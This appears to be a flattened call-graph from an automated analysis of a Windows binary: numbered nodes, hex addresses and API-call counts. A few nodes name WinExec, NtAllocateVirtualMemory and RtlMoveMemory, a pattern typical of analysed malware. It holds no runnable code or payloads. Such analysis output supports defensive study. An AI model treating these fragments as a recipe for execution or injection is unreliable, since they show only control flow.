26220->26222 26223 28b7be8 14 API calls 26221->26223 26224 28c0bb6 26222->26224 26225 28bf821 26223->26225 26227 28a4824 8 API calls 26224->26227 26226 28a4824 8 API calls 26225->26226 26228 28bf842 26226->26228 26234 28c0bd7 26227->26234 26229 28a4964 26228->26229 26230 28bf84d 26229->26230 26231 28bf879 26230->26231 26232 28bf884 26231->26232 26233 28a4698 26232->26233 26235 28bf891 26233->26235 26236 28c0c26 26234->26236 26238 28b7be8 14 API calls 26235->26238 26237 28b7be8 14 API calls 26236->26237 26239 28c0c32 26237->26239 26240 28bf89d 26238->26240 26241 28a4824 8 API calls 26239->26241 26242 28a4824 8 API calls 26240->26242 26249 28c0c53 26241->26249 26243 28bf8be 26242->26243 26244 28a4964 26243->26244 26245 28bf8c9 26244->26245 26246 28bf8f5 26245->26246 26247 28bf900 26246->26247 26248 28a4698 26247->26248 26250 28bf90d 26248->26250 26251 28c0ca2 26249->26251 26252 28b7be8 14 API calls 26250->26252 26253 28b7be8 14 API calls 26251->26253 26254 28bf919 26252->26254 26255 28c0cae 26253->26255 26257 28bc640 10 API calls 26254->26257 26256 28bd20c 8 API calls 26255->26256 26258 28c0cbe 26256->26258 26259 28bf92e 26257->26259 26260 28a44f4 8 API calls 26258->26260 26261 28a57dc 10 API calls 26259->26261 26262 28c0cce 26260->26262 26263 28bf944 26261->26263 26265 28a4824 8 API calls 26262->26265 26264 28a4824 8 API calls 26263->26264 26266 28bf965 26264->26266 26268 28c0cef 26265->26268 26267 28bf970 26266->26267 26269 28bf99c 26267->26269 26270 28c0d26 26268->26270 26271 28bf9a7 26269->26271 26272 28c0d31 26270->26272 26273 28a4698 26271->26273 26275 28b7be8 14 API calls 26272->26275 26274 28bf9b4 26273->26274 26276 28b7be8 14 API calls 26274->26276 26277 28c0d4a 26275->26277 26278 28bf9c0 26276->26278 26279 28a4824 8 API calls 26277->26279 26280 28a4824 8 API calls 26278->26280 26283 28c0d6b 26279->26283 26281 28bf9e1 26280->26281 26282 28bf9ec 26281->26282 26285 28bfa18 26282->26285 26284 28c0da2 26283->26284 26286 28c0dad 26284->26286 26287 28a4698 26285->26287 26289 28c0dba 26286->26289 26288 28bfa30 26287->26288 26290 28b7be8 14 API calls 26288->26290 26291 28b7be8 14 API calls 26289->26291 26292 28bfa3c 26290->26292 26293 28c0dc6 26291->26293 26295 28a4824 8 API calls 26292->26295 26294 28a4824 8 API calls 26293->26294 26296 28c0de7 26294->26296 26297 28bfa5d 26295->26297 26298 28c0df2 26296->26298 26301 28bfa68 26297->26301 26299 28c0dff 26298->26299 26300 28c0e1e 26299->26300 26302 28c0e29 26300->26302 26303 28a4698 26301->26303 26305 28c0e36 26302->26305 26304 28bfaac 26303->26304 26306 28b7be8 14 API calls 26304->26306 26307 28b7be8 14 API calls 26305->26307 26308 28bfab8 26306->26308 26309 28c0e42 26307->26309 26310 28a4824 8 API calls 26308->26310 26311 28c0e53 26309->26311 26316 28bfae3 26310->26316 26312 28bc640 10 API calls 26311->26312 26313 28c0e69 26312->26313 26314 28a57dc 10 API calls 26313->26314 26315 28c0e7c 26314->26315 26318 28a4824 8 API calls 26315->26318 26317 28bfafb 26316->26317 26320 28bfb1a 26317->26320 26319 28c0e9d 26318->26319 26321 28c0ea8 26319->26321 26322 28bfb25 26320->26322 26330 28c0eb5 26321->26330 26323 28a4698 26322->26323 26324 28bfb32 26323->26324 26325 28b7be8 14 API calls 26324->26325 26326 28bfb3e 26325->26326 26327 28a4824 8 API calls 26326->26327 26328 28bfb5f 26327->26328 26329 28bfb6a 26328->26329 26334 28bfb77 26329->26334 26331 28b7be8 14 API calls 26330->26331 26332 28c0ef8 26331->26332 26333 28a4824 8 API calls 26332->26333 26335 28c0f19 26333->26335 26336 28bfb96 26334->26336 26337 28c0f24 26335->26337 26338 28bfba1 26336->26338 26343 28c0f31 26337->26343 26339 28b7be8 14 API calls 26338->26339 26340 28bfbba 26339->26340 26341 28a44f4 8 API calls 26340->26341 26342 28a4824 8 API calls 26340->26342 26341->26340 26344 28bfbf4 26342->26344 26345 28b7be8 14 API calls 26343->26345 26348 28bfbff 26344->26348 26346 28c0f74 26345->26346 26347 28a44f4 8 API calls 26346->26347 26349 28c0f83 26347->26349 26353 28bfc0c 26348->26353 26350 28a44f4 8 API calls 26349->26350 26351 28c0f92 26350->26351 26352 28a44f4 8 API calls 26351->26352 26354 28c0fa1 26352->26354 26357 28bfc43 26353->26357 26355 28a44f4 8 API calls 26354->26355 26356 28c0fb0 26355->26356 26358 28a44f4 8 API calls 26356->26358 26359 28b7be8 14 API calls 26357->26359 26360 28c0fbf 26358->26360 26361 28bfc4f 26359->26361 26362 28a44f4 8 API calls 26360->26362 26363 28a4824 8 API calls 26361->26363 26364 28c0fce 26362->26364 26374 28bfc70 26363->26374 26365 28a44f4 8 API calls 26364->26365 26366 28c0fdd 26365->26366 26367 28a44f4 8 API calls 26366->26367 26368 28c0fec 26367->26368 26369 28a44f4 8 API calls 26368->26369 26370 28c0ffb 26369->26370 26371 28a44f4 8 API calls 26370->26371 26372 28c100a 26371->26372 26373 28a44f4 8 API calls 26372->26373 26375 28c1019 26373->26375 26376 28bfcbf 26374->26376 26377 28a4824 8 API calls 26375->26377 26378 28b7be8 14 API calls 26376->26378 26381 28c103a 26377->26381 26379 28bfccb 26378->26379 26380 28bc8ac 15 API calls 26379->26380 26382 28bfcdd 26379->26382 26383 28c0772 26379->26383 26411 28bfdec 26379->26411 26664 28b7be8 14 API calls 26379->26664 26666 28c0562 26379->26666 26380->26379 26387 28c1071 26381->26387 26384 28a4824 8 API calls 26382->26384 26383->26040 26383->26308 26385 28bfcfe 26384->26385 26386 28bfd09 26385->26386 26390 28bfd16 26386->26390 26388 28b7be8 14 API calls 26387->26388 26389 28c1095 26388->26389 26391 28a4824 8 API calls 26389->26391 26392 28bfd4d 26390->26392 26394 28c10b6 26391->26394 26393 28b7be8 14 API calls 26392->26393 26399 28bfd59 26393->26399 26396 28c10ce 26394->26396 26395 28a4824 8 API calls 26395->26399 26397 28c1105 26396->26397 26398 28b7be8 14 API calls 26397->26398 26400 28c1111 26398->26400 26399->26379 26399->26395 26401 28c1128 26400->26401 26402 28a7e3c GetFileAttributesA 26401->26402 26403 28c1133 26402->26403 26404 28c113b 26403->26404 26470 28c1319 26403->26470 26406 28a4824 8 API calls 26404->26406 26405 28a4824 8 API calls 26407 28c1345 26405->26407 26408 28c115c 26406->26408 26409 28c1350 26407->26409 26412 28c1174 26408->26412 26415 28c135d 26409->26415 26410 28a4824 8 API calls 26410->26411 26411->26410 26413 28bfe25 26411->26413 26414 28c1193 26412->26414 26416 28bfe44 26413->26416 26417 28b7be8 14 API calls 26414->26417 26418 28b7be8 14 API calls 26415->26418 26422 28b7be8 14 API calls 26416->26422 26420 28c11b7 26417->26420 26419 28c13a0 26418->26419 26421 28a4824 8 API calls 26419->26421 26423 28a4824 8 API calls 26420->26423 26424 28c13c1 26421->26424 26425 28bfe68 26422->26425 26426 28c11d8 26423->26426 26427 28c13cc 26424->26427 26428 28a4824 8 API calls 26425->26428 26431 28c11f0 26426->26431 26433 28c13d9 26427->26433 26429 28bfe89 26428->26429 26430 28bfea1 26429->26430 26434 28bfec0 26430->26434 26432 28c1227 26431->26432 26435 28b7be8 14 API calls 26432->26435 26436 28b7be8 14 API calls 26433->26436 26437 28bfed8 26434->26437 26438 28c1233 26435->26438 26439 28c141c 26436->26439 26440 28b7be8 14 API calls 26437->26440 26446 28c1262 26438->26446 26441 28a49c4 8 API calls 26439->26441 26445 28bfee4 26440->26445 26442 28c144f 26441->26442 26443 28a4824 8 API calls 26442->26443 26454 28c1470 26443->26454 26444 28a4824 8 API calls 26444->26445 26445->26444 26447 28bff17 26445->26447 26448 28b7be8 14 API calls 26446->26448 26452 28bff24 26447->26452 26449 28c1286 26448->26449 26450 28a4824 8 API calls 26449->26450 26451 28c12a7 26450->26451 26459 28c12bf 26451->26459 26453 28bff4e 26452->26453 26461 28bff5b 26453->26461 26455 28b7be8 14 API calls 26454->26455 26456 28c14cb 26455->26456 26458 28a4824 8 API calls 26456->26458 26457 28b7be8 14 API calls 26457->26461 26463 28c14ec 26458->26463 26462 28c12f6 26459->26462 26460 28a4824 8 API calls 26460->26461 26461->26457 26461->26460 26464 28bff93 26461->26464 26465 28b7be8 14 API calls 26462->26465 26467 28c1504 26463->26467 26468 28bffa0 26464->26468 26466 28c1302 26465->26466 26466->26470 26471 28c153b 26467->26471 26469 28a4964 26468->26469 26475 28bffca 26469->26475 26470->26405 26472 28b7be8 14 API calls 26471->26472 26473 28c1547 26472->26473 26476 28a4824 8 API calls 26473->26476 26474 28b7be8 14 API calls 26474->26475 26475->26474 26478 28b6d84 33 API calls 26475->26478 26477 28c1568 26476->26477 26483 28c1573 26477->26483 26479 28bfff3 26478->26479 26480 28b2854 40 API calls 26479->26480 26481 28c0003 26480->26481 26482 28a4824 8 API calls 26481->26482 26484 28c002f 26481->26484 26482->26481 26485 28c15aa 26483->26485 26486 28a4698 26484->26486 26488 28b7be8 14 API calls 26485->26488 26487 28c003c 26486->26487 26491 28c005b 26487->26491 26489 28c15c3 26488->26489 26490 28a4824 8 API calls 26489->26490 26493 28c15e4 26490->26493 26494 28c0073 26491->26494 26492 28b7be8 14 API calls 26492->26494 26498 28c161b 26493->26498 26494->26492 26495 28a4824 8 API calls 26494->26495 26496 28c00a0 26495->26496 26497 28c00ab 26496->26497 26500 28c00b8 26497->26500 26499 28b7be8 14 API calls 26498->26499 26501 28c163f 26499->26501 26502 28c00e2 26500->26502 26504 28c1654 26501->26504 26659 28c1aa1 26501->26659 26503 28c00ef 26502->26503 26507 28b7be8 14 API calls 26503->26507 26506 28a4824 8 API calls 26504->26506 26505 28a4824 8 API calls 26509 28c3366 26505->26509 26511 28c1692 26506->26511 26508 28c00fb 26507->26508 26510 28ae3b8 48 API calls 26508->26510 26512 28a4824 8 API calls 26508->26512 26515 28c3371 26509->26515 26510->26508 26513 28c16aa 26511->26513 26514 28c013c 26512->26514 26516 28c16bd 26513->26516 26513->26659 26518 28c0147 26514->26518 26520 28c33a8 26515->26520 26517 28a4824 8 API calls 26516->26517 26523 28c16de 26517->26523 26519 28c0173 26518->26519 26524 28c017e 26519->26524 26521 28b7be8 14 API calls 26520->26521 26522 28c33c1 26521->26522 26525 28a4824 8 API calls 26522->26525 26530 28c1715 26523->26530 26527 28c018b 26524->26527 26529 28c33e2 26525->26529 26526 28b7be8 14 API calls 26526->26527 26527->26526 26528 28a4824 8 API calls 26527->26528 26533 28c01b8 26528->26533 26536 28c3419 26529->26536 26531 28b7be8 14 API calls 26530->26531 26532 28c1739 26531->26532 26534 28a4824 8 API calls 26532->26534 26535 28c01d0 26533->26535 26540 28c175a 26534->26540 26537 28c01ef 26535->26537 26538 28b7be8 14 API calls 26536->26538 26542 28c0207 26537->26542 26539 28c343d 26538->26539 26541 28a4824 8 API calls 26539->26541 26545 28c1772 26540->26545 26543 28c345e 26541->26543 26544 28b7be8 14 API calls 26542->26544 26551 28c3476 26543->26551 26546 28c0213 26544->26546 26548 28c17a9 26545->26548 26547 28ae3b8 48 API calls 26546->26547 26553 28c0224 26547->26553 26550 28b7be8 14 API calls 26548->26550 26549 28a4824 8 API calls 26549->26553 26552 28c17b5 26550->26552 26557 28c34ad 26551->26557 26554 28a4824 8 API calls 26552->26554 26553->26549 26555 28c0253 26553->26555 26556 28c17d6 26554->26556 26558 28c0260 26555->26558 26563 28c17e1 26556->26563 26559 28b7be8 14 API calls 26557->26559 26564 28c028a 26558->26564 26560 28c34b9 26559->26560 26561 28a4824 8 API calls 26560->26561 26562 28c34da 26561->26562 26567 28c34e5 26562->26567 26565 28c1818 26563->26565 26566 28b7be8 14 API calls 26564->26566 26569 28b7be8 14 API calls 26565->26569 26571 28c02a3 26566->26571 26575 28c351c 26567->26575 26568 28a4824 8 API calls 26568->26571 26570 28c1831 26569->26570 26573 28c1841 26570->26573 26571->26568 26572 28c02cf 26571->26572 26582 28c02dc 26572->26582 26574 28a7e3c GetFileAttributesA 26573->26574 26576 28c184c 26574->26576 26577 28b7be8 14 API calls 26575->26577 26578 28c1854 26576->26578 26576->26659 26579 28c3535 26577->26579 26580 28a4824 8 API calls 26578->26580 26581 28a4824 8 API calls 26579->26581 26589 28c1875 26580->26589 26583 28c3556 26581->26583 26584 28b7be8 14 API calls 26582->26584 26588 28c358d 26583->26588 26585 28c031f 26584->26585 26586 28ae3b8 48 API calls 26585->26586 26587 28b17a4 59 API calls 26585->26587 26586->26585 26592 28c0348 26587->26592 26593 28b7be8 14 API calls 26588->26593 26591 28b7be8 14 API calls 26589->26591 26590 28a4824 8 API calls 26590->26592 26594 28c18d0 26591->26594 26592->26590 26597 28c0381 26592->26597 26595 28c35b1 26593->26595 26596 28a4824 8 API calls 26594->26596 26598 28bc78c 8 API calls 26595->26598 26604 28c18f1 26596->26604 26600 28c03a0 26597->26600 26599 28c35c7 26598->26599 26601 28a44f4 8 API calls 26599->26601 26605 28a4964 26600->26605 26602 28c35d7 26601->26602 26603 28a4824 8 API calls 26602->26603 26614 28c35f8 26603->26614 26609 28c1909 26604->26609 26606 28c03ab 26605->26606 26607 28a4698 26606->26607 26608 28c03b8 26607->26608 26610 28b7be8 14 API calls 26608->26610 26615 28c1940 26609->26615 26611 28c03c4 26610->26611 26612 28a4824 8 API calls 26611->26612 26613 28c03e5 26612->26613 26618 28c03fd 26613->26618 26617 28c363a 26614->26617 26616 28b7be8 14 API calls 26615->26616 26620 28c194c 26616->26620 26619 28c3647 26617->26619 26621 28c041c 26618->26621 26622 28b7be8 14 API calls 26619->26622 26623 28c1975 26620->26623 26626 28c0427 26621->26626 26624 28c3653 26622->26624 26625 28a794c 8 API calls 26623->26625 26627 28a4824 8 API calls 26624->26627 26628 28c1981 26625->26628 26632 28c0434 26626->26632 26633 28c3674 26627->26633 26629 28a4824 8 API calls 26628->26629 26631 28c19d8 26629->26631 26630 28b7be8 14 API calls 26630->26632 26637 28c19e3 26631->26637 26632->26630 26634 28c0445 26632->26634 26635 28c36b6 26633->26635 26636 28a4824 8 API calls 26634->26636 26638 28c0471 26634->26638 26639 28c36c3 26635->26639 26636->26634 26643 28c1a1a 26637->26643 26644 28c047e 26638->26644 26640 28b7be8 14 API calls 26639->26640 26641 28c36cf 26640->26641 26642 28a7a88 32 API calls 26641->26642 26645 28c36d9 26642->26645 26646 28b7be8 14 API calls 26643->26646 26652 28a4698 26644->26652 26647 28bd270 8 API calls 26645->26647 26649 28c1a33 26646->26649 26648 28c36eb 26647->26648 26650 28a44f4 8 API calls 26648->26650 26651 28a4824 8 API calls 26649->26651 26653 28c36fb 26650->26653 26658 28c1a79 26651->26658 26654 28c04b5 26652->26654 26655 28a4824 8 API calls 26653->26655 26656 28b7be8 14 API calls 26654->26656 26657 28c371c 26655->26657 26656->26399 26660 28c3727 26657->26660 26658->26659 26659->25600 26659->26505 26661 28b7be8 14 API calls 26660->26661 26662 28c3777 26661->26662 26663 28a4824 8 API calls 26662->26663 26669 28c3798 26663->26669 26664->26379 26665 28a4824 8 API calls 26665->26666 26666->26665 26667 28c059b 26666->26667 26668 28c05ba 26667->26668 26670 28a4964 26668->26670 26671 28b7be8 14 API calls 26669->26671 26672 28c05c5 26670->26672 26673 28c37f3 26671->26673 26674 28a4698 26672->26674 26675 28a4824 8 API calls 26673->26675 26676 28c05d2 26674->26676 26683 28c3814 26675->26683 26677 28b7be8 14 API calls 26676->26677 26678 28c05de 26677->26678 26679 28a4824 8 API calls 26678->26679 26680 28c05ff 26679->26680 26681 28c0617 26680->26681 26682 28c0636 26681->26682 26684 28c0641 26682->26684 26685 28b7be8 14 API calls 26683->26685 26688 28c064e 26684->26688 26686 28c386f 26685->26686 26687 28a4824 8 API calls 26686->26687 26695 28c3890 26687->26695 26689 28b7be8 14 API calls 26688->26689 26690 28bd578 8 API calls 26688->26690 26689->26688 26691 28c066a 26690->26691 26692 28a44f4 8 API calls 26691->26692 26693 28a4824 8 API calls 26691->26693 26692->26691 26694 28c069b 26693->26694 26697 28c06a6 26694->26697 26696 28b7be8 14 API calls 26695->26696 26698 28c38eb 26696->26698 26701 28a4964 26697->26701 26699 28bd198 8 API calls 26698->26699 26700 28c38fb 26699->26700 26702 28bd20c 8 API calls 26700->26702 26703 28c06dd 26701->26703 26704 28c390c 26702->26704 26710 28c06ea 26703->26710 26705 28a44f4 8 API calls 26704->26705 26706 28c391c 26705->26706 26707 28a4824 8 API calls 26706->26707 26711 28c393d 26707->26711 26708 28b7be8 14 API calls 26708->26710 26709 28a4824 8 API calls 26709->26710 26710->26708 26710->26709 26713 28c0759 26710->26713 26712 28b7be8 14 API calls 26711->26712 26714 28c3998 26712->26714 26715 28b7be8 14 API calls 26713->26715 26716 28a4824 8 API calls 26714->26716 26715->26383 26717 28c39b9 26716->26717 26718 28b7be8 14 API calls 26717->26718 26719 28c3a14 26718->26719 26720 28a4824 8 API calls 26719->26720 26721 28c3a35 26720->26721 26722 28b7be8 14 API calls 26721->26722 26723 28c3a90 26722->26723 26724 28a4824 8 API calls 26723->26724 26725 28c3ab1 26724->26725 26726 28b7be8 14 API calls 26725->26726 26727 28c3b0c 26726->26727 26728 28a4824 8 API calls 26727->26728 26729 28c3b2d 26728->26729 26730 28b7be8 14 API calls 26729->26730 26731 28c3b88 26730->26731 26732 28a4824 8 API calls 26731->26732 26733 28c3ba9 26732->26733 26734 28b7be8 14 API calls 26733->26734 26735 28c3c04 26734->26735 26736 28c53e0 26735->26736 26737 28a4824 8 API calls 26735->26737 26738 28a4824 8 API calls 26736->26738 26739 28c3c39 26737->26739 26742 28c5401 26738->26742 26739->26736 26740 28c3c64 26739->26740 26741 28a4824 8 API calls 26740->26741 26746 28c3c85 26741->26746 26743 28b7be8 14 API calls 26742->26743 26744 28c545c 26743->26744 26745 28a4824 8 API calls 26744->26745 26750 28c547d 26745->26750 26747 28b7be8 14 API calls 26746->26747 26748 28c3ce0 26747->26748 26749 28a4824 8 API calls 26748->26749 26754 28c3d01 26749->26754 26751 28b7be8 14 API calls 26750->26751 26752 28c54d8 26751->26752 26753 28a4824 8 API calls 26752->26753 26758 28c54f9 26753->26758 26755 28b7be8 14 API calls 26754->26755 26756 28c3d5c 26755->26756 26757 28a4824 8 API calls 26756->26757 26762 28c3d7d 26757->26762 26759 28b7be8 14 API calls 26758->26759 26760 28c5554 26759->26760 26761 28a4824 8 API calls 26760->26761 26766 28c5575 26761->26766 26763 28b7be8 14 API calls 26762->26763 26764 28c3dd8 26763->26764 26765 28a4824 8 API calls 26764->26765 26769 28c3df9 26765->26769 26767 28b7be8 14 API calls 26766->26767 26768 28c55d0 26767->26768 26770 28a4824 8 API calls 26768->26770 26771 28a4824 8 API calls 26769->26771 26772 28c55f1 26770->26772 26773 28c3e31 26771->26773 26774 28b7be8 14 API calls 26772->26774 26775 28b7be8 14 API calls 26773->26775 26776 28c564c 26774->26776 26777 28c3e8c 26775->26777 26779 28c6190 26776->26779 26780 28c5661 26776->26780 26778 28a4824 8 API calls 26777->26778 26783 28c3ead 26778->26783 26782 28a4824 8 API calls 26779->26782 26781 28a4824 8 API calls 26780->26781 26786 28c5682 26781->26786 26784 28c61b1 26782->26784 26785 28b7be8 14 API calls 26783->26785 26788 28b7be8 14 API calls 26784->26788 26787 28c3f08 26785->26787 26790 28b7be8 14 API calls 26786->26790 26789 28a4824 8 API calls 26787->26789 26792 28c620c 26788->26792 26795 28c3f29 26789->26795 26791 28c56dd 26790->26791 26793 28a4824 8 API calls 26791->26793 26794 28a4824 8 API calls 26792->26794 26797 28c56fe 26793->26797 26798 28c622d 26794->26798 26796 28b7be8 14 API calls 26795->26796 26799 28c3f84 26796->26799 26802 28b7be8 14 API calls 26797->26802 26800 28b7be8 14 API calls 26798->26800 26801 28a4824 8 API calls 26799->26801 26803 28c6288 26800->26803 26807 28c3fa5 26801->26807 26804 28c5759 26802->26804 26805 28a4824 8 API calls 26803->26805 26806 28a4824 8 API calls 26804->26806 26810 28c62a9 26805->26810 26809 28c577a 26806->26809 26808 28b7be8 14 API calls 26807->26808 26811 28c4000 26808->26811 26813 28b7be8 14 API calls 26809->26813 26814 28b7be8 14 API calls 26810->26814 26812 28a4824 8 API calls 26811->26812 26817 28c403a 26812->26817 26818 28c57d5 26813->26818 26815 28c6304 26814->26815 26816 28a4824 8 API calls 26815->26816 26822 28c6325 26816->26822 26821 28a4824 8 API calls 26817->26821 26819 28c57f8 WinExec 26818->26819 26820 28a4824 8 API calls 26819->26820 26825 28c581f 26820->26825 26824 28c4072 26821->26824 26823 28b7be8 14 API calls 26822->26823 26827 28c6380 26823->26827 26828 28b7be8 14 API calls 26824->26828 26829 28b7be8 14 API calls 26825->26829 26826 28c6b54 26830 28a4824 8 API calls 26826->26830 26827->26826 26831 28a4824 8 API calls 26827->26831 26832 28c40cd 26828->26832 26833 28c587a 26829->26833 26836 28c6b75 26830->26836 26837 28c63b6 26831->26837 26834 28a4824 8 API calls 26832->26834 26835 28a4824 8 API calls 26833->26835 26838 28c40ee 26834->26838 26839 28c589b 26835->26839 26840 28b7be8 14 API calls 26836->26840 26841 28b7be8 14 API calls 26837->26841 26842 28b7be8 14 API calls 26838->26842 26843 28b7be8 14 API calls 26839->26843 26844 28c6bd0 26840->26844 26845 28c6411 26841->26845 26846 28c4149 26842->26846 26847 28c58f6 26843->26847 26848 28a4824 8 API calls 26844->26848 26849 28a4824 8 API calls 26845->26849 26850 28a4824 8 API calls 26846->26850 26851 28a4824 8 API calls 26847->26851 26852 28c6bf1 26848->26852 26853 28c6432 26849->26853 26854 28c416a 26850->26854 26855 28c5917 26851->26855 26856 28b7be8 14 API calls 26852->26856 26857 28b7be8 14 API calls 26853->26857 26858 28b7be8 14 API calls 26854->26858 26859 28b7be8 14 API calls 26855->26859 26860 28c6c4c 26856->26860 26861 28c648d 26857->26861 26862 28c41c5 26858->26862 26866 28c5972 26859->26866 26863 28a4824 8 API calls 26860->26863 26864 28a4824 8 API calls 26861->26864 26865 28a4824 8 API calls 26862->26865 26870 28c6c6d 26863->26870 26871 28c64ae 26864->26871 26872 28c41e6 26865->26872 26867 28b9e70 26 API calls 26866->26867 26868 28c5999 26867->26868 26869 28a4824 8 API calls 26868->26869 26881 28c59ba 26869->26881 26873 28b7be8 14 API calls 26870->26873 26874 28b7be8 14 API calls 26871->26874 26875 28b7be8 14 API calls 26872->26875 26884 28c6cc8 26873->26884 26876 28c6509 26874->26876 26877 28c4241 26875->26877 26878 28a4824 8 API calls 26876->26878 26879 28a4824 8 API calls 26877->26879 26888 28c652a 26878->26888 26889 28c4262 26879->26889 26880 28c74a8 26882 28a4824 8 API calls 26880->26882 26883 28b7be8 14 API calls 26881->26883 26893 28c74c9 26882->26893 26886 28c5a15 26883->26886 26884->26880 26885 28a4824 8 API calls 26884->26885 26898 28c6d13 26885->26898 26887 28a4824 8 API calls 26886->26887 26900 28c5a36 26887->26900 26890 28b7be8 14 API calls 26888->26890 26891 28b7be8 14 API calls 26889->26891 26892 28c6585 26890->26892 26894 28c42bd 26891->26894 26895 28a4824 8 API calls 26892->26895 26897 28b7be8 14 API calls 26893->26897 26896 28a4824 8 API calls 26894->26896 26908 28c65a6 26895->26908 26909 28c42de 26896->26909 26899 28c7524 26897->26899 26902 28b7be8 14 API calls 26898->26902 26901 28a4824 8 API calls 26899->26901 26903 28b7be8 14 API calls 26900->26903 26913 28c7545 26901->26913 26904 28c6d6e 26902->26904 26905 28c5a91 26903->26905 26906 28a4824 8 API calls 26904->26906 26907 28a4824 8 API calls 26905->26907 26919 28c6d8f 26906->26919 26921 28c5ab2 26907->26921 26910 28b7be8 14 API calls 26908->26910 26911 28b7be8 14 API calls 26909->26911 26912 28c6601 26910->26912 26914 28c4339 26911->26914 26915 28a4824 8 API calls 26912->26915 26917 28b7be8 14 API calls 26913->26917 26916 28a4824 8 API calls 26914->26916 26931 28c6622 26915->26931 26918 28c4361 26916->26918 26920 28c75a0 26917->26920 26923 28c436c WinExec 26918->26923 26924 28b7be8 14 API calls 26919->26924 26922 28a4824 8 API calls 26920->26922 26926 28b7be8 14 API calls 26921->26926 26933 28c75c1 26922->26933 26925 28a4824 8 API calls 26923->26925 26927 28c6dea 26924->26927 26934 28c4393 26925->26934 26928 28c5b0d 26926->26928 26929 28a4824 8 API calls 26927->26929 26930 28a4824 8 API calls 26928->26930 26936 28c6e0b 26929->26936 26943 28c5b4d 26930->26943 26932 28b7be8 14 API calls 26931->26932 26937 28c667d 26932->26937 26935 28b7be8 14 API calls 26933->26935 26938 28b7be8 14 API calls 26934->26938 26945 28c761c 26935->26945 26940 28b7be8 14 API calls 26936->26940 26941 28a4824 8 API calls 26937->26941 26939 28c43ee 26938->26939 26942 28a4824 8 API calls 26939->26942 26944 28c6e66 26940->26944 26957 28c66bb 26941->26957 26958 28c440f 26942->26958 26947 28b7be8 14 API calls 26943->26947 26946 28bd198 8 API calls 26944->26946 26949 28b7be8 14 API calls 26945->26949 26948 28c6e81 26946->26948 26950 28c5ba8 26947->26950 26951 28a4824 8 API calls 26948->26951 26953 28c764f 26949->26953 26952 28a4824 8 API calls 26950->26952 26954 28c6eaa 26951->26954 26966 28c5bc9 26952->26966 26955 28b7be8 14 API calls 26953->26955 26956 28a4824 8 API calls 26954->26956 26962 28c7682 26955->26962 26972 28c6ee2 26956->26972 26959 28b7be8 14 API calls 26957->26959 26960 28b7be8 14 API calls 26958->26960 26961 28c6716 26959->26961 26963 28c446a 26960->26963 26964 28a4824 8 API calls 26961->26964 26967 28b7be8 14 API calls 26962->26967 26965 28a4824 8 API calls 26963->26965 26979 28c6737 26964->26979 26980 28c448b 26965->26980 26968 28b7be8 14 API calls 26966->26968 26971 28c76b5 26967->26971 26969 28c5c24 26968->26969 26970 28a4824 8 API calls 26969->26970 26987 28c5c45 26970->26987 26973 28b7be8 14 API calls 26971->26973 26975 28b7be8 14 API calls 26972->26975 26974 28c76e8 26973->26974 26976 28a4824 8 API calls 26974->26976 26977 28c6f3d 26975->26977 26991 28c7709 26976->26991 26978 28a4824 8 API calls 26977->26978 26993 28c6f5e 26978->26993 26981 28b7be8 14 API calls 26979->26981 26983 28b7be8 14 API calls 26980->26983 26982 28c6792 26981->26982 26985 28a4824 8 API calls 26982->26985 26984 28c44e6 26983->26984 26986 28a4824 8 API calls 26984->26986 27001 28c67b3 26985->27001 27002 28c4507 26986->27002 26988 28b7be8 14 API calls 26987->26988 26989 28c5ca0 26988->26989 26992 28b5aa8 32 API calls 26989->26992 26995 28b7be8 14 API calls 26991->26995 26994 28c5ccc 26992->26994 26996 28b7be8 14 API calls 26993->26996 27000 28a4b90 8 API calls 26994->27000 26997 28c7764 26995->26997 26998 28c6fb9 26996->26998 26999 28a4824 8 API calls 26997->26999 27004 28c6fcb 26998->27004 27005 28c72a2 26998->27005 27020 28c7785 26999->27020 27003 28c5ce1 27000->27003 27006 28b7be8 14 API calls 27001->27006 27011 28b7be8 14 API calls 27002->27011 27007 28a4824 8 API calls 27003->27007 27008 28a4824 8 API calls 27004->27008 27010 28a4824 8 API calls 27005->27010 27009 28c680e GetCurrentProcess 27006->27009 27022 28c5d02 27007->27022 27024 28c6fec 27008->27024 27012 28b7968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 27009->27012 27025 28c72c3 27010->27025 27013 28c4562 27011->27013 27014 28c6828 27012->27014 27016 28c47d5 27013->27016 27017 28c4577 27013->27017 27015 28a4824 8 API calls 27014->27015 27033 28c684e 27015->27033 27019 28a4824 8 API calls 27016->27019 27018 28a4824 8 API calls 27017->27018 27038 28c4598 27018->27038 27036 28c47f6 27019->27036 27021 28b7be8 14 API calls 27020->27021 27023 28c77e0 27021->27023 27027 28b7be8 14 API calls 27022->27027 27026 28a4824 8 API calls 27023->27026 27029 28b7be8 14 API calls 27024->27029 27030 28b7be8 14 API calls 27025->27030 27050 28c7801 27026->27050 27028 28c5d5d 27027->27028 27039 28a49bc 8 API calls 27028->27039 27032 28c7047 27029->27032 27031 28c731e 27030->27031 27034 28a4824 8 API calls 27031->27034 27035 28a4824 8 API calls 27032->27035 27037 28b7be8 14 API calls 27033->27037 27053 28c733f 27034->27053 27052 28c7068 27035->27052 27043 28b7be8 14 API calls 27036->27043 27041 28c68a9 27037->27041 27045 28b7be8 14 API calls 27038->27045 27040 28c5d7a RtlMoveMemory 27039->27040 27042 28a4824 8 API calls 27040->27042 27044 28a4824 8 API calls 27041->27044 27057 28c5da1 27042->27057 27046 28c4851 27043->27046 27059 28c68ca 27044->27059 27047 28c45f3 27045->27047 27049 28a4824 8 API calls 27046->27049 27048 28a4824 8 API calls 27047->27048 27064 28c4614 27048->27064 27066 28c4872 27049->27066 27051 28b7be8 14 API calls 27050->27051 27056 28c785c 27051->27056 27054 28b7be8 14 API calls 27052->27054 27055 28b7be8 14 API calls 27053->27055 27058 28c70c3 27054->27058 27060 28c739a 27055->27060 27063 28b7be8 14 API calls 27056->27063 27065 28b7be8 14 API calls 27057->27065 27061 28a4824 8 API calls 27058->27061 27067 28b7be8 14 API calls 27059->27067 27062 28a4824 8 API calls 27060->27062 27080 28c70e4 27061->27080 27081 28c73bb 27062->27081 27075 28c788f 27063->27075 27072 28b7be8 14 API calls 27064->27072 27069 28c5dfc 27065->27069 27070 28b7be8 14 API calls 27066->27070 27068 28c6925 27067->27068 27071 28a4824 8 API calls 27068->27071 27073 28a4824 8 API calls 27069->27073 27074 28c48cd 27070->27074 27088 28c6946 27071->27088 27076 28c466f 27072->27076 27086 28c5e1d 27073->27086 27077 28a4824 8 API calls 27074->27077 27079 28b7be8 14 API calls 27075->27079 27078 28a4824 8 API calls 27076->27078 27094 28c48ee 27077->27094 27092 28c4690 27078->27092 